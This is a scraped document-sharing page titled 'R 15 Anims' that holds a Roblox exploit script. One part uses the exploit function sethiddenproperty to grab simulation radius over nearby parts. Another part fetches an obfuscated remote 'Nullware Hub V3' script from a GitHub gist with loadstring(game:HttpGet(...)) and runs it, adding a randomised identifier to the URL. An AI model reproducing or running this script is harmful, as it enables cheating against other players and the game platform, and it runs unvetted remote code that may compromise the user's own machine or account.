R 15 Anims

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

local LocalPlayer = game:GetService("Players").

LocalPlayer
local Heartbeat = game:GetService("RunService").Heartbeat

Heartbeat:Connect(function()
LocalPlayer.MaximumSimulationRadius = math.huge
sethiddenproperty(LocalPlayer, "SimulationRadius", math.huge)
end)
-- Script above is a fix to limbs falling --

-- Nullware Hub V3 | --
getgenv().Theme = "Purple" -- To change the UI Theme, set this to one of the
following options: "Red", "Purple", "Blue", "Green", "Yellow"
loadstring(game:HttpGet("https://gist.githubusercontent.com/M6HqVBcddw2qaN4s/
2d722888a388017c18028cd434c43a25/raw/dcccf1027fe4b90780e47767aaf584389c9d7771/
EULma3fU90PUOKUn?identifier=".. (function()local a=""for b=1,256 do local
c=math.random(1,3)a=a..string.char(c==1 and math.random(48,57)or c==2 and
math.random(97,122)or c==3 and math.random(65,90))end;return a end)()))()

You might also like